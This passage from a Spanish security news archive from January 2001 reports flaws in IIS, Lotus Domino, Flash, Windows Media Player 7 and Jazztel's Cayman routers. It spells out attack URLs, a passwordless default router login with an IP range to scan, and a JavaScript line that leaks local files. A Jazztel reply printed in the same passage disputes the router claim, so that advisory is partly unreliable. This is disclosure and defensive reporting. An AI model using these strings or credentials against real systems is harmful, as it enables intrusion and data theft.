lo ha reconocido en un mensaje enviado a Jazztel del que reproducimos
un extracto:

"Tras un estudio mucho mas pormenizado del `problema´ [...] se debe
llegar a la conclusión de que he metido la pata sin lugar a dudas en
el planteamiento, todo debido a que no he probado a cambiar nada y por
lo tanto no comprobé que no se podía. Habia leído la configuración del
Router y en ella, para cada uno de los comandos no existe nada que
indicase si era o no ejecutable para un administrador o no. Debido a
lo erroneo de mi planteamiento se podia "comprobar" el problema pero
solo a medias, nadie (y yo el primero) probó a cambiar nada importante
ni siquiera a resetear el Router, en gran medida por que los routers
no eran nuestros y no se debe hacer; así nadie se dio cuenta de la
imposibilidad de ejecutar determinadas acciones.
[...]
Sé que he dañado el buen nombre de Jazztel por una mal planteamiento
del problema y haber supuesto cosas sin haberlas comprobado, he podido
constatar como todos los routers tenían la última versión de software
y estaban funcionando perfectamente [...]"


Jazztel es consciente de la importancia que la seguridad tiene para
sus clientes y presta la máxima atención a cualquier posible riesgo o
amenaza que pudiera afectarles. Jazztel lamenta que la publicación de
esta noticia se haya producido sin haber realizado previamente una
comprobación de la existencia de un problema real y espera que este
desafortunado incidente sirva como referencia para que en el futuro se
contraste suficientemente, antes de su publicación, la veracidad de
determinadas informaciones que pueden generar alarma y desconfianza en
los usuarios. Confiamos en que este hecho no afecte a la confianza que
nuestros clientes tienen depositada en Jazztel.





Mª Eugenia Pestana
Directora de Comunicación de Jazztel
mep@jazztel.com


Más información:

Grave problema de seguridad en instalaciones Jazztel
http://www.hispasec.com/unaaldia.asp?id=804



domingo, 7 de enero de 2001

Visualización de archivos en Internet Information Server

Georgi Guninski vuelve a la actividad con un aviso de seguridad que
afecta a las instalaciones de Internet Information Server. En esta
ocasión el problema permite acceder al código fuente de archivos cgi,
scripts y similares.
Según informa Guninski el problema afecta a las instalaciones de
Internet Information Server 5.0 (el servidor web que se instala bajo
Windows 2000 Server), pero en nuestras pruebas hemos podido reproducir
el problema en servidores con Internet Information Server 4.0. El
problema afecta a todos los servidores protegidos con el parche para
la vulnerabilidad de lectura de archivos mediante .htr.

El problema es muy similar a un aviso anterior que ya publicamos en
Hispasec el 20 de julio, y por el cual mediante una sencilla
construcción de la forma
http://www.servidor.afectado.com/global.asa+.htr era posible
visualizar el código fuente de las paginas y scripts del servidor web.

En esta ocasión, en el aviso de Guninski se informa que la URL
maliciosa debe construirse de la forma
http://www.servidor.afectado.com/ test.pl%3F+.htr. Con lo que se
mostrará el contenido del archivo /test.pl en vez de ejecutarlo. Este
ataque funcionará en caso de que el servidor tenga instalado el parche
publicado por Microsoft para evitar el problema original anteriormente
comentado.

Guninski comenta en su aviso que el problema no funciona con algunos
tipo de archivos .asp si estos contienen determinados caracteres.
Aunque por las pruebas realizadas en nuestro laboratorio el problema
permite la visualización del fichero global.asa que en muchas
ocasiones contiene passwords o cadenas de conexión con bases de datos.



Antonio Ropero
antonior@hispasec.com


Más información:

IIS 5.0 allows viewing files using 3F+.htr
http://www.guninski.com/iishtr.html



sábado, 6 de enero de 2001

Grave problema de seguridad en instalaciones Jazztel

Las instalaciones ADSL de Jazztel con graves problemas de seguridad
al configurar la administración del router sin contraseña. A
continuación reproducimos el aviso íntegro, respetando el nombre
de usuario por defecto y rangos de direcciones incluidos por el
autor, una vez que Jazztel ha corregido el problema. Agradecemos
la colaboración a Antonio Cortés, quién nos puso sobre aviso el
pasado día 5.
Es muy común, y no por ello debemos tomar como normal, el uso de
instalaciones tipo en nuestros sistemas. Me he encontrado por una
casualidad uno de estos casos en una prueba rutinaria en
colaboración con el administrador de una red "afectada".

En un Chat (IRC), un administrador de una red me pidió comprobase
si con la IP que accedía a Internet (con un router) se podía ver una
página web almacenada en su ordenador local. Le indiqué que eso solo
sería posible si el router tenía configurada esa opción (la de
redirigir un puerto suyo a uno interno). Introduje su IP en el
navegador y me encontré con una pantalla para validarme
(Usuario/Contraseña) en su router para administrarlo, solo probé un
nombre de usuario y entré. El router lo tenían configurado con una
clásica configuración por defecto. También se podía acceder de igual
forma a través de un telnet.

Lo primero que hice fue advertir al administrador para que cambiase
las contraseñas del router, me informó que no podía pues, Jazztel se
lo había instalado y lo administraban ellos, no tenía ningun
login/contraseña. Era una solución cerrada.

La verdad es que Jazztel utilizaban para acceder al router los login
jazztel, cayman-DSL y administrator; estos tenían contraseña, pero no
el login cayman, que no tenia contraseña y permite administrar el
router.

Lo que parecía algo puntual resulta ser habitual en todas las
instalaciones que ha hecho Jazztel con Routers ADSL Cayman, debido a
esto todas las redes a las que da acceso a internet con este sistema
puede verse gravemente comprometidas.

Esto se puede comprobar buscando (por ejemplo) routers de las
direcciones 62.14.64.1 a 62.14.64.254.

Se puede decir que todos los routers ADSL Cayman que tiene instalados
Jazztel de esta manera permiten a un intruso reconfigurar el
dispositivo de acceso a Internet (Router) pudiendo prepararlo como
puerta a la red Interna, una red interna que estaría visible desde
Internet tras configurar las tablas de enrutado.

Otro ataque, más basico, de DoS (Denegación de Servicio) consistiría
en dejarlo fuera de servicio desconfigurándolo y cambiándole las
contraseñas, en ese momento el router ADSL no sería operativo hasta
que, tras solicitarlo al fabricante, nos enviase el modo de
inicializarlo. Si esto ocurriese deberíamos solicitar al fabricante
www.cayman.com vía email el sistema de desconfiguración tras enviarle
el numero de serie de la unidad que esta en la parte inferior del
Router.

Un problema de estos routers es que si alguien borra los logs, este
no guarda que han sido borrados, por lo que cualquier cosa que
hayan hecho habrá quedado borrada.

Consejo, si posee un acceso a internet con un router Cayman de
Jazztel solicite a Jazztel cambie la configuración así como que
le envie el Log de accesos al router donde nos muestra si nuestra
red ha sido comprometida o no.

Debemos tener cuidado con muchas cosas en lo relativo a la seguridad
de nuestra empresa (red/sistema), y como está demostrado, no debemos
confiarsela a nadie, si no nos garantiza ésta.



Antonio Cortés
antonio.cortes@arrakis.es



viernes, 5 de enero de 2001

Vulnerabilidad en Lotus Domino 5.0.5

Georgi Guninski ha descubierto una grave vulnerabilidad en Lotus
Domino 5.0.5, el servidor web de Lotus, por la cual es posible leer
archivos situados fuera de la raíz del web.
Guninski, un habitual de nuestras noticias, parece que amplía su rango
de actuación habitual, que hasta el momento se situaba en los dos
navegadores más populares, para pasar a anunciar una vulnerabilidad en
el servidor web Lotus Domino 5.0.5.

El problema reside en las URLs construidas de la forma
http://domino.objetivo/.nsf/../winnt/win.ini que permitirá acceder al
contenido del archivo c:\winnt\win.ini. Hay que destacar que la URL
anterior no funcionará en Internet Explorer, por alguna extraña razón
quita la cadena .nsf/../ por lo que la petición deberá realizarse con
Netscape.



Antonio Ropero
antonior@hispasec.com


Más información:

Aviso de Georgi Gununski
http://www.guninski.com/lotus1.html



jueves, 4 de enero de 2001

Posibilidad de ejecución de código mediante Flash

Una vulnerabilidad en los plugins de Macromedia Shockwave Flash
puede permitir a un atacante al bloqueo del navegador de un visitante
e incluso la ejecución de código dentro de la máquina remota.
Este problema producido por un desbordamiento de buffer se ha podido
comprobar que afecta a todos los navegadores y sistemas que utilizan
los mencionados plugins. Según fuentes de Macromedia los citados
plugins están instalados en el 90% de los navegadores existentes en el
mercado. Específicamente el problema no está relacionado ni con la
plataforma ni con el navegador, por lo que afecta potencialmente a
cualquier plataforma o navegador con los citados plugins.

Esta vulnerabilidad en Flash abre una nueva puerta a la posible
distribución de código malicioso mediante la introducción del programa
dentro del archivo "SWF". Incluso se podría realizar un archivo con
capacidades multiplataforma lo que favorecería una mayor propagación
de virus, troyanos, etc.

El formato del archivo SWF, sigue una pauta continua:
etiqueta longitud datos etiqueta longitud datos....
Donde etiqueta indica la acción a realizar, longitud es el tamaño de
los datos de dicha etiqueta mientras que el último campo son los datos
para la etiqueta correspondiente).

Como ejemplo, tomaremos el expuesto por el descubridor del problema.
Define_Picture "40 bytes" datos_de_la_imagen.

Algunas etiquetas tienen un formato de datos más complejo, en este
caso los datos pueden contener:
Subetiqueta sublongitud subdatos Subetiqueta sublongitud subdatos "0"
El "0" se emplea como una marca que determina el final de los datos,
de forma que la etiqueta completa se puede mostrar de una forma
similar a la siguiente:
etiqueta longitud (Subetiqueta1 sublongitud1 subdatos1 Subetiqueta2
sublongitud2 subdatos2 "0"). Define_Sprite y Do_Action son algunas de
las etiquetas que emplean este modelo de datos más complejo.

Si el "0" desaparece o está más lejos del tamaño indicado en el campo
longitud, se produce un problema de desbordamiento de buffer, lo que
causa el cuelgue del navegador e incluso si el SWF está manipulado de
forma maliciosa podrá lograrse la ejecución de código incluido en él.



Antonio Román
antonio_roman@hispasec.com


Más información:

Macromedia Flash SWF Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/2162

Macromedia Flash
http://www.macromedia.com/software/flash/

Macromedia Flash Player source code
http://www.macromedia.com/software/flash/open/licensing/sourcecode/



miércoles, 3 de enero de 2001

Confusiones sobre el agujero en Windows Media Player 7

Al parecer, según se deriva de los comentarios de algunos lectores, la
demostración ofrecida por Guninski ha podido confundir a muchos
usuarios al hacer creer que sus sistemas son vulnerables cuando en
realidad no lo son. Tal y como indicábamos, los sistemas con Windows
Media Player cuya versión sea anterior a la 7 se encuentran fuera de
peligro.
Son muchos los lectores que se han dirigido a nosotros para indicarnos
que, tras visitar la página de demostración, sus sistemas se
presentaban vulnerables ante la prueba de Guninski, aun cuando su
versión del reproductor multimedia es la 6. En realidad se trata
de un efecto óptico, si nos fijamos con atención podemos comprobar que
en ningún momento se consuma la vulnerabilidad.

Cuando visualizamos la página web demostración de Guninski aparece
un cuadro que nos avisa que va a leer el fichero c:\test.txt. A
continuación, se abre una nueva ventana de Internet Explorer con el
contenido de ese fichero. Este paso parece ser el causante de la
confusión, en realidad esto no representa vulnerabilidad alguna.
Es simplemente el resultado de una sencilla e inofensiva orden que
hace uso del método window.open de JavaScript:
window.open("file://c:/test.txt","georgi");

Si nos fijamos en el lado derecho de la barras de estado, en las dos
ventanas de Internet Explorer que se encuentran abiertas en ese
momento (esquina inferior derecha), en la inicial aparece "Internet",
y en la segunda que se abre con el contenido del fichero se puede
leer "Mi PC". Es decir, son dos zonas de seguridad diferentes, y el
contenido que alberga la página "Mi PC" en local no está accesible
para la ventana de "Internet". No se puede leer el contenido del
fichero c:\test.txt desde Internet, hasta este momento no hay
vulnerabilidad.

La vulnerabilidad se demuestra cuando aparece una ventana de alerta
con el contenido del fichero c:\test.txt, ya que esta ventana es
lanzada desde la página inicial que se encontraba en la zona de
"Internet". En ese momento los datos locales han pasado a dominio
de Internet, y la vulnerabilidad se consuma. Es el resultado de
la llamada al control ActiveX de Windows Media Player 7
anteriormente declarado, que recoge la información de la ventana
local ("MiPC"), según la orden:
document.o1.object.launchURL("javascript:alert(document.body.innerText)");

Para que los usuarios puedan observarlo de una forma más gráfica,
a continuación pueden visualizar el resultado de la demostración
en un entorno vulnerable (Windows Me):
http://www.hispasec.com/vulnerable.gif



Bernardo Quintero
bernardo@hispasec.com


Más información:

01/01/2001 - Grave vulnerabilidad en Windows Media Player 7
http://www.hispasec.com/unaaldia.asp?id=799

Demostración de la vulnerabilidad
http://www.guninski.com/wmp7ie.html

Windows Media Player 7 and IE vulnerability - executing arbitrary programs
http://www.guninski.com/wmp7ie-desc.html